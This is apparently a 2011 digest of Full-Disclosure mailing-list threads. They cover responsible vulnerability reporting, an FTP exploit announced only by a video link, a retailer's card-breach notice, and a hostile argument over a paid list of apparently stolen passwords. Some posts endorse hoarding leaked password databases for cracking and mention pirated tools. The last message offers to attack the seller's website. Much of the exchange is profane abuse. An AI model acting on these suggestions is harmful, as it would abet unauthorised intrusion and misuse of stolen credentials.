> I'd say your chances of getting money are slim/nil and that it would be a bad idea to even attempt. Even if it's not your intention, and even if you make it explicitly clear that you won't use the info or disseminate the info even if he decides not to pay you to fix it, it could still be perceived as an extortion attempt.
>
> As others have said, the best bet is to send an anonymous email, give him all the details and hope he takes proper action to fix it. If you really feel the need to let them know who you are (or you did this from a location where they're going to track it back to you if they check the logs once you alert them of the problem anyway), I'd still say the best thing to do is to simply give them all the information and some small advice about how it may be fixed, for free.
>
> There simply isn't any good way to get actual money out of this without it seeming like a shakedown/extortion, or the owner simply getting cops involved because they don't even want to bother spending any money on the issues and would rather just label you some elite evil hacker and pretend there is nothing they can do rather than spend the money.
>
> However, if you're hellbent on it, the only relatively safe way I see to get anything of value out of this would be to turn over all information and advice on fixing the problem and make it clear you just want to alert them to the problem. A lot of people aren't exactly technical and won't understand what you're saying, so you can offer to fix it, I can't stress this enough, for FREE. Then if by the end of fixing it they appreciate your work and think you've done well, you could always ask if you can use them as a reference, which might help get actual paying work down the road. This is best done at the END and only if you feel that you've developed some trust and they appreciate the help you gave them.
>
> All that said though, the safest way, as said, is simply an anonymous e-mail and it is the best option. If you are going to stick your neck out there, at least realize you're not likely to see any real money from it and there is the risk you get it chopped off.
>
> On Thu, Dec 1, 2011 at 9:04 AM, Peter Dawson slash...@gmail.com wrote:
>> Send site owner/admin anon email and leave it at that.. as Thor mentioned give em the info for free!
Re: [Full-disclosure] Client aproach
Depending on your country/local laws (no idea where you're from), how you discovered the vulnerabilities and if you actually tested them and gained unauthorized access in the process, there is the possibility you're on the wrong side of the law. If you haplessly stumbled across it and then left it be but just know it's there, you're probably safe. If you found something that seemed odd, and actively tried to test it or to verify that it was an issue without prior permission, you're almost certainly in violation of some law. Even if it was very minor verification.

As well, a lot of whether or not the owner decides to get police involved and try to come after you is simply going to depend on their technological knowledge, how they perceive the information you tell them and simply whether or not they decide they like you, so it's a real crap shoot.

I'd say your chances of getting money are slim/nil and that it would be a bad idea to even attempt. Even if it's not your intention, and even if you make it explicitly clear that you won't use the info or disseminate the info even if he decides not to pay you to fix it, it could still be perceived as an extortion attempt.

As others have said, the best bet is to send an anonymous email, give him all the details and hope he takes proper action to fix it. If you really feel the need to let them know who you are (or you did this from a location where they're going to track it back to you if they check the logs once you alert them of the problem anyway), I'd still say the best thing to do is to simply give them all the information and some small advice about how it may be fixed, for free.

There simply isn't any good way to get actual money out of this without it seeming like a shakedown/extortion, or the owner simply getting cops involved because they don't even want to bother spending any money on the issues and would rather just label you some elite evil hacker and pretend there is nothing they can do rather than spend the money.

However, if you're hellbent on it, the only relatively safe way I see to get anything of value out of this would be to turn over all information and advice on fixing the problem and make it clear you just want to alert them to the problem. A lot of people aren't exactly technical and won't understand what you're saying, so you can offer to fix it, I can't stress this enough, for FREE. Then if by the end of fixing it they appreciate your work and think you've done well, you could always ask if you can use them as a reference, which might help get actual paying work down the road. This is best done at the END and only if you feel that you've developed some trust and they appreciate the help you gave them.

All that said though, the safest way, as said, is simply an anonymous e-mail and it is the best option. If you are going to stick your neck out there, at least realize you're not likely to see any real money from it and there is the risk you get it chopped off.

On Thu, Dec 1, 2011 at 9:04 AM, Peter Dawson slash...@gmail.com wrote:
> Send site owner/admin anon email and leave it at that.. as Thor mentioned give em the info for free!
Re: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
On Thu, Dec 1, 2011 at 10:37 PM, TAS p0wnsa...@gmail.com wrote:
> Wonder guy, the basis of your conclusion is as ridiculous as your question. Microsoft and Google are products companies. At least TCS and Wipro are not. They are into offshore and managed business domains. Infosys is also into making custom solutions and they are all closed source. And none of the companies that you mentioned cater to such a large audience as MS and Google do. Are you going to start looking for every single company in secunia and come up with such preposterous conclusions?

Hi TAS,

I never made any conclusions. I only asked a question and it was not a loaded question but a curious one. In case you missed it, here is the question once again:

> I am trying to verify this by using Secunia. I can find plenty of Microsoft and Google security vulnerabilities [ http://secunia.com/advisories/search/?search=Microsoft+Google ] but none for Infosys TCS or Wipro [ http://secunia.com/advisories/search/?search=Infosys+TCS+Wipro ]. What is the matter here? Indian software vendors are the best in the whole world in security matters or Secunia simply doesn't care about Indian software vendors?

Thanks for the clarification that TCS and Wipro are not product companies. But I heard that Infosys makes banking products. But anyway, from all the replies to my email I am able to understand that Secunia is not listing vendors catering to a small part of the software world. So that answers my question.

Thanks TAS and everyone.
[Full-disclosure] FreeBSD ftpd ProFTPd on FreeBSD exploit in Action [HACKTRO] :
Hi lists,

this is Kingcope

btw this exploit does not depend on the ProFTPd version as illustrated in the youtube video below, it will unlock ProFTPd 1.3.4a too.

enjoy the hacktro!!

http://youtu.be/10uedlgNEJA
Re: [Full-disclosure] FreeBSD ftpd ProFTPd on FreeBSD exploit in Action [HACKTRO] :
Awesome stuff =)

On 2 December 2011 09:17, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote:
> Hi lists,
>
> this is Kingcope
>
> btw this exploit does not depend on the ProFTPd version as illustrated in the youtube video below, it will unlock ProFTPd 1.3.4a too.
>
> enjoy the hacktro!!
>
> http://youtu.be/10uedlgNEJA
[Full-disclosure] International Checkout
Hello,

Read the email below if you want to laugh a little. Especially the answer to question 1 in the FAQ at the end of the email.

No word on how they were pirated or how many credit card numbers were stolen though, but obviously I'm not the only one who's received that email: http://forums.whirlpool.net.au/archive/1822778

Anyway, I guess it's alright, since the Security section of their privacy policy helpfully indicates that "by using this web site, you acknowledge that the Internet is inherently insecure and that there is always a risk that your personally identifiable information could be intercepted or otherwise accessed and improperly used", which seems to be their way of saying that, whatever happens, it's just going to be the fault of the Internet, not theirs: http://www.internationalcheckout.com/privacy.php

(and I guess "We take commercially reasonable precautions to protect your personally identifiable information" is just their way of saying they care about protecting my data only as long as it doesn't cost them too much to do so...)

Bleh.

Philippe

From: International Checkout Customer Support informat...@internationalcheckout.com
To: meun...@ccs.neu.edu
Subject: Important Information Regarding Your Purchase at International Checkout
Date: Wed, 30 Nov 2011 00:41:06 -0500

Dear Customer,

You have made a purchase of Dr. Martens through International Checkout in the last 18 months and Dr. Martens has asked us to ensure you are advised of a recent security issue which took place with International Checkout's online system.

International Checkout was recently the victim of a system intruder who was able to access encrypted credit card information. International Checkout has conducted a thorough investigation into the potential risks to our customers. You are receiving this email from International Checkout because your credit card information was in the database which was compromised.

We have taken all necessary action to ensure our systems at International Checkout meet recommended and compliant security levels.

We encourage you to carefully review your recent credit card statements to identify any unauthorized activity. If you find any unauthorized activity please contact your credit card issuer or bank immediately. You may also consider changing your credit card number if you are concerned for the security of your card details.

International Checkout deeply regrets any inconvenience this will cause. For more information regarding the security issue please feel free to contact International Checkout by email to discuss this further at: informat...@internationalcheckout.com

You can also contact International Checkout's Customer Service by phone on any of the following numbers between the hours of 6:30 a.m. and 6:30 p.m. PST:

USA and Canada: +1.866.682.0641
USA Phone: +001.310.601.8196
UK Phone: +44.20.8133.2436
Australia Phone: +61.28003.4685
Denmark Phone: +45.369.50312
Sweden Phone: +46.4069.35779
Hong Kong Phone: +852.8175.6057
Japan Phone: +81.50553.46826
Finland Phone: +358.(02)3619.0437
Brazil Phone: +55.(11)3230.9539
Ireland Phone: +353.1443.3715
Mexico Phone: +52.558.421.8266
New Zealand Phone: +64.9889.0408

You can also find answers to questions you may have in the FAQs below.

Sincerely,
International Checkout Inc.

___

International Checkout Security Breach FAQ's
November 29, 2011

Q1: What is this about?

A1: International Checkout has been the victim of a recent security breach. In mid-September, 2011 we discovered that an intruder accessed and potentially compromised our system. We immediately commenced an investigation, notified law enforcement, purged credit card data from our databases to ensure no future vulnerability, and have consulted with both our processor and the credit card associations. Through this investigation, which was just completed on October 31, 2011, we learned that on August 23, 2011, an intruder gained access to part of our system that contained credit card numbers of customers. The credit card information in that database was encrypted, but we have learned that the intruder was able to access the encryption key that was stored separately. International Checkout has implemented all security enhancements recommended by the third party investigator to improve our system security. In addition, we have successfully moved our website to a new system that has stronger security measures in place.

Q2: What is International Checkout doing?

A2: As a precaution, International Checkout is providing notification to people whose information may have been in the database that was accessed so
[Full-disclosure] SANS AppSec 2012 CFP reminder
Hi everyone,

It's been over a month since we first announced the CFP for the SANS AppSec Summit being held in Las Vegas, Nevada on April 30 - May 1, 2012. We've received a number of great submissions so far but there's only two months left until the deadline on February 1, 2012. If you'd like to speak please get your submission in as soon as possible. Hope to see you in Vegas!

The theme for this conference is "Application Security at Scale". Billions of records in the cloud. Millions of smart mobile devices. Millions of developers writing new code. Hundreds of apps in your enterprise. Untold numbers of existing bugs. Unknown numbers of sophisticated attackers exploiting your software. What cutting edge techniques are attackers using? How do large enterprises handle these problems at scale? And how do small companies manage it all with fewer resources?

We invite you to submit presentations in the following areas:

- Cloud Security
- Mobile Security
- Security in the SDLC
- Secure Coding
- Security Architecture
- Securing Legacy Applications
- Securing Open Source Frameworks
- Program Development
- Security Metrics
- Security Testing
- Penetration Testing
- Cutting Edge Attacks
- Cutting Edge Defense
- Case Studies
- Any topic related to Application Security

Submission Deadline
February 1, 2012

Submit papers via EasyChair (account required). Talks will be 50 minutes in length.
https://www.easychair.org/conferences/?conf=sansappsec2012

For additional information please visit the conference web site or contact us via email.
https://www.sans.org/appsec-2012/
callforpapers-app...@sans.org

Please forward to anyone who might be interested in speaking.

Thanks!
The SANS AppSec 2012 Team
Re: [Full-disclosure] Large password list
There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help:

- keep ongoing effort to improve the quality of the list over time
- ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free)
- cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger
- reduce abuse

On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote:
> On 12/1/11 6:14 PM, Addy Yeow wrote:
>> I thought some of you may find this large password list useful, over 27 million entries.
>> http://dazzlepod.com/uniqpass/
>> (it's a paid list though, at $4.99)
>
> Anyone linking a warez version (Why pay $4.99?) ?
>
> -naif
Re: [Full-disclosure] Large password list
> - reduce abuse

The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts?

I'm partly tempted to buy and post the list here just to spite you for being so idiotic.

On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote:
> There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help:
>
> - keep ongoing effort to improve the quality of the list over time
> - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free)
> - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger
> - reduce abuse
>
> On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote:
>> On 12/1/11 6:14 PM, Addy Yeow wrote:
>>> I thought some of you may find this large password list useful, over 27 million entries.
>>> http://dazzlepod.com/uniqpass/
>>> (it's a paid list though, at $4.99)
>>
>> Anyone linking a warez version (Why pay $4.99?) ?
>>
>> -naif
Re: [Full-disclosure] Large password list
Which country is UNIQPASS registered as a tm?

On Fri, Dec 2, 2011 at 1:47 AM, adam a...@papsy.net wrote:
>> - reduce abuse
>
> The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts?
>
> I'm partly tempted to buy and post the list here just to spite you for being so idiotic.
>
> On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote:
>> There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help:
>>
>> - keep ongoing effort to improve the quality of the list over time
>> - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free)
>> - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger
>> - reduce abuse
>>
>> On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote:
>>> On 12/1/11 6:14 PM, Addy Yeow wrote:
>>>> I thought some of you may find this large password list useful, over 27 million entries.
>>>> http://dazzlepod.com/uniqpass/
>>>> (it's a paid list though, at $4.99)
>>>
>>> Anyone linking a warez version (Why pay $4.99?) ?
>>>
>>> -naif
Re: [Full-disclosure] Large password list
Also, not to beat a dead horse, but..

> - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger

Is also pretty ridiculous. Why? Because you're offering hashes.txt (http://dazzlepod.com/site_media/txt/hashes.txt), passwords.txt (http://dazzlepod.com/site_media/txt/passwords.txt) and uniqpass_preview.txt (http://dazzlepod.com/site_media/txt/uniqpass_preview.txt) to the world:

C:\Users\adam\Desktop>ls -la uniqpass_preview.txt | gawk "{print $5}"
19855177

C:\Users\adam\Desktop>ls -la passwords.txt | gawk "{print $5}"
17496649

C:\Users\adam\Desktop>ls -la hashes.txt | gawk "{print $5}"
22033538

C:\Users\adam\Desktop>echo 19855177 + 17496649 + 22033538 | bc
59385364

In total, 56MB and you're offering them for free and uncompressed.

C:\Users\adam\Desktop>zip -9 combined.zip passwords.txt uniqpass_preview.txt hashes.txt
  adding: passwords.txt (164 bytes security) (deflated 60%)
  adding: uniqpass_preview.txt (164 bytes security) (deflated 38%)
  adding: hashes.txt (164 bytes security) (deflated 46%)

C:\Users\adam\Desktop>ls -la combined.zip | gawk "{print $5}"
31337317

Meanwhile, if you were compressing them: they'd be almost half the size. But you're not, you don't even seem concerned with doing so, and you're going to pretend that 8MB is really making *that* big of a difference? If so, why are you wasting 27MB by offering those 3 files uncompressed? That doesn't really make much sense to me.

On Thu, Dec 1, 2011 at 7:52 PM, Benji m...@b3nji.com wrote:
> Which country is UNIQPASS registered as a tm?
>
> On Fri, Dec 2, 2011 at 1:47 AM, adam a...@papsy.net wrote:
>>> - reduce abuse
>>
>> The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts?
>>
>> I'm partly tempted to buy and post the list here just to spite you for being so idiotic.
>>
>> On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote:
>>> There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help:
>>>
>>> - keep ongoing effort to improve the quality of the list over time
>>> - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free)
>>> - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger
>>> - reduce abuse
>>>
>>> On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote:
>>>> On 12/1/11 6:14 PM, Addy Yeow wrote:
>>>>> I thought some of you may find this large password list useful, over 27 million entries.
>>>>> http://dazzlepod.com/uniqpass/
>>>>> (it's a paid list though, at $4.99)
>>>>
>>>> Anyone linking a warez version (Why pay $4.99?) ?
>>>>
>>>> -naif
Re: [Full-disclosure] Large password list
This is what whitehats would probably class as a 'blackhat'. The sad thing is, i bet NO blackhats really like this.. not serious ones.

It's sad, you're a pathetic person, resorting to online theft to cover your bs demands. As pointed out, what 'costs' for keeping stolen data... ? ONLY the cost You are to the community. You're called a bad scourge, and a bad example of a hacker. I wish you and your website and service are overthrown. You're a fool, and you suck. i hope feds are pulling you apart. amigo. go fk yourself, rot. You're NO hacker, you're a 'wanker'. go whack d1ck sum more.

Bad sad kid with some sqli... well, sadly, you should NEVER post criminal activities to a list like this. are you stupid or just fucking REALLY STUPID?? Idiot. You are NO blackhat, and NO hacker.

xd

On 2 December 2011 12:52, Benji <m...@b3nji.com> wrote:
> Which country is UNIQPASS registered as a tm?
> [snip]
Re: [Full-disclosure] Large password list
> 22033538

what's this hash for, nothin'. he's a f00l. altho i don't like you, at least you see a fool as i do. unfortunately, you're not much better.

On 2 December 2011 13:05, adam <a...@papsy.net> wrote:
> Also, not to beat a dead horse, but..
>
>> - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger
>
> Is also pretty ridiculous. Why? Because you're offering hashes.txt, passwords.txt and uniqpass_preview.txt to the world:
>
> C:\Users\adam\Desktop> ls -la uniqpass_preview.txt | gawk {print $5}
> 19855177
> C:\Users\adam\Desktop> ls -la passwords.txt | gawk {print $5}
> 17496649
> C:\Users\adam\Desktop> ls -la hashes.txt | gawk {print $5}
> 22033538
> [snip]
Re: [Full-disclosure] Large password list
In case you missed it, that's one of the other files he's hosting off that website. Part of his plan to sell this groundbreaking .txt file, or whatever.

On Thu, Dec 1, 2011 at 8:11 PM, xD 0x41 <sec...@gmail.com> wrote:
>> 22033538
>
> what's this hash for, nothin'. he's a f00l. altho i don't like you, at least you see a fool as i do. unfortunately, you're not much better.
>
> On 2 December 2011 13:05, adam <a...@papsy.net> wrote:
>> Also, not to beat a dead horse, but..
>> [snip]
Re: [Full-disclosure] New FREE security tool!
Fix defaced website or flip burgers to help mom with the rent, that's a tough dilemma for a script-kiddie.

Speaking of helping mom: http://web.archive.org/web/20110129092551/http://crazycoders.com/

On Thu, Dec 1, 2011 at 3:47 PM, ghost <gho...@gmail.com> wrote:
> I saw your site got defaced today, mr you're meant to be PRO. Maybe time for less posting and more edumacation ?
>
> On Thu, Dec 1, 2011 at 11:41 AM, xD 0x41 <sec...@gmail.com> wrote:
>> dude, you're meant to be PRO,
Re: [Full-disclosure] Large password list
As usual Xd is trolling .. and I shouldn't answer but he pisses me off ..

Gary B

On 12/01/2011 09:10 PM, xD 0x41 wrote:
> This is what whitehats would probably class as a 'blackhat'. The sad thing is, i bet NO blackhats really like this.. not serious ones.
>
> It's sad, you're a pathetic person, resorting to online theft to cover your bs demands. As pointed out, what 'costs' for keeping stolen data... ? ONLY the cost You are to the community. You're called a bad scourge, and a bad example of a hacker. I wish you and your website and service are overthrown. You're a fool, and you suck. i hope feds are pulling you apart. amigo. go fk yourself, rot. You're NO hacker, you're a 'wanker'. go whack d1ck sum more.
>
> Bad sad kid with some sqli... well, sadly, you should NEVER post criminal activities to a list like this. are you stupid or just fucking REALLY STUPID?? Idiot. You are NO blackhat, and NO hacker.
>
> xd
>
> On 2 December 2011 12:52, Benji <m...@b3nji.com> wrote:
>> Which country is UNIQPASS registered as a tm?
>> [snip]
Re: [Full-disclosure] New FREE security tool!
fail.

On 2 December 2011 13:25, Antony widmal <antony.wid...@gmail.com> wrote:
> Fix defaced website or flip burgers to help mom with the rent, that's a tough dilemma for a script-kiddie.
>
> Speaking of helping mom: http://web.archive.org/web/20110129092551/http://crazycoders.com/
>
> On Thu, Dec 1, 2011 at 3:47 PM, ghost <gho...@gmail.com> wrote:
>> I saw your site got defaced today, mr you're meant to be PRO. Maybe time for less posting and more edumacation ?
>>
>> On Thu, Dec 1, 2011 at 11:41 AM, xD 0x41 <sec...@gmail.com> wrote:
>>> dude, you're meant to be PRO,
Re: [Full-disclosure] Large password list
On Fri, 02 Dec 2011 13:10:14 +1100, xD 0x41 said:
> Idiot You are NO blackhat,and NO hacker. xd

You know things are pretty screwed up when I'm +1'ing an xD rant. :)
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
If you want to respect the license of this code you cannot include the exploit in your software.

And don't get me started about my patent on NOP sleds!

/mz
Re: [Full-disclosure] Large password list
I am at a lack of words for this, why pay $4.99 when you can just do some simple googling? You can even search pastebin and get a mass collection of password lists from dbases. Add a dash of awk and maybe a pinch of sed and voilà! If you are like me I always download and store the various dbase leaks because it makes an awesome dictionary. Some more simple magic and you have a cut down list of all the common passwords used.

I'd rather spend the money on some coffee to drink while I do the above examples.

On Thu, Dec 1, 2011 at 10:14 AM, Addy Yeow <ayeo...@gmail.com> wrote:
> I thought some of you may find this large password list useful, over 27 million entries.
> http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99)
Re: [Full-disclosure] Large password list
Or simply, use openwall.com who at least do something and have an outstanding os... they do not charge on that basis. and also the so-called hash: if you look in the 3 offered files, they're all the same length of digits. i am not even sure what he's offering, because i assume that is a decrypted list... not encrypted, yet he has *_hash.txt there, which is the same length as the other txt files, same one line, 5 digit kinda list... not even a 1234 :s lol... its very ambiguous, and i'd beware that it is just not a flare to get ppl to visit, to infect, other ways... be careful guys... they're cdlists, and a million others linked to them :s its kinda stupid and, hopefully it dies... like, shutdown.

On 2 December 2011 14:59, Sanguinarious Rose <sanguiner...@occultusterra.com> wrote:
> I am at a lack of words for this, why pay $4.99 when you can just do some simple googling? You can even search pastebin and get a mass collection of password lists from dbases. Add a dash of awk and maybe a pinch of sed and voilà! If you are like me I always download and store the various dbase leaks because it makes an awesome dictionary. Some more simple magic and you have a cut down list of all the common passwords used.
>
> I'd rather spend the money on some coffee to drink while I do the above examples.
>
> On Thu, Dec 1, 2011 at 10:14 AM, Addy Yeow <ayeo...@gmail.com> wrote:
>> I thought some of you may find this large password list useful, over 27 million entries.
>> http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99)
Re: [Full-disclosure] New FREE security tool!
Why did you rewrite metasploit?

On Tue, Nov 29, 2011 at 9:09 PM, <nore...@exploitpack.com> wrote:
> Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules.
>
> The latest release, version 1.1 is available for download right away!
>
> Take a look of the new features on this quick video: http://www.youtube.com/watch?v=cMa2OrB7b5A
>
> Download it directly from the main site: http://www.youtube.com/watch?v=DPX7JdvTRmg
>
> We are looking for investors or donations to maintain this project alive! Thank you!
>
> The only one who has daily updates
> Exploit Pack
Re: [Full-disclosure] New FREE security tool!
That's not the main one :P Check out the INSECTPro tool ;) but, that's metasploit v2 and v3 i believe... and a lot nicer than this,... same author... i have a copy, but he won't let me know if i can use my copy to pull updates from git ;'( I assume that means the pirated copy i have must work fine, as long as it is just that... pirated... and check out his exploitpack.com/downloads/ very interesting files there yesterday... hehe... pentesting the testers... i guess we all get that... but, insectpro is available as warez, i'm sure of it.. a lot bigger than his exploitpack tho.. i would not mind if exploitpack stays in python, it might inspire many coders who do code, but only py, to code more... so, i see some of his stuff as cool but then, he made insectpro, a direct rip off of msf, which is the bad side...

On 2 December 2011 15:48, Sanguinarious Rose <sanguiner...@occultusterra.com> wrote:
> Why did you rewrite metasploit?
> [snip]
Re: [Full-disclosure] New FREE security tool!
> The only one who has daily updates

That's total crap... look like 3 posts away, he had to apologise for playing with his new MMORPG game, instead of doing as he had said, which was porting the latest freebsd PoC/exploit code to his py. he even made an exe installer, which led nowhere... then, he apparently has now fixed it.. but, he is by no way pro, and those updates, i'd watch, because any exe coming from some place called exploitpack.com is just.. well... you'd wanna check it, yes.

On 2 December 2011 15:48, Sanguinarious Rose <sanguiner...@occultusterra.com> wrote:
> Why did you rewrite metasploit?
> [snip]
Re: [Full-disclosure] Large password list
http://dazzlepod.com/site_media/txt/passwords.txt

he's put a lot of passes here, and makes direct compares to JTR on the website.. this seems to be the Point of sale also... so this domain would shape the outcome..

On 2 December 2011 14:40, Richard Golodner <rgolod...@infratection.com> wrote:
> On Fri, 2011-12-02 at 14:14 +1100, xD 0x41 wrote:
>> needs to be shut down... if it can be... cheers, always happy to speak to you :)
>
> Always happy to speak with you as well my friend. We can shut the fucker down. Can you give me his domain name. I think that a shitty php bug would get a lot of L44t hackers as they see that shit and just download it without thinking about it. Get me a little background info and I can get started.
>
> Richard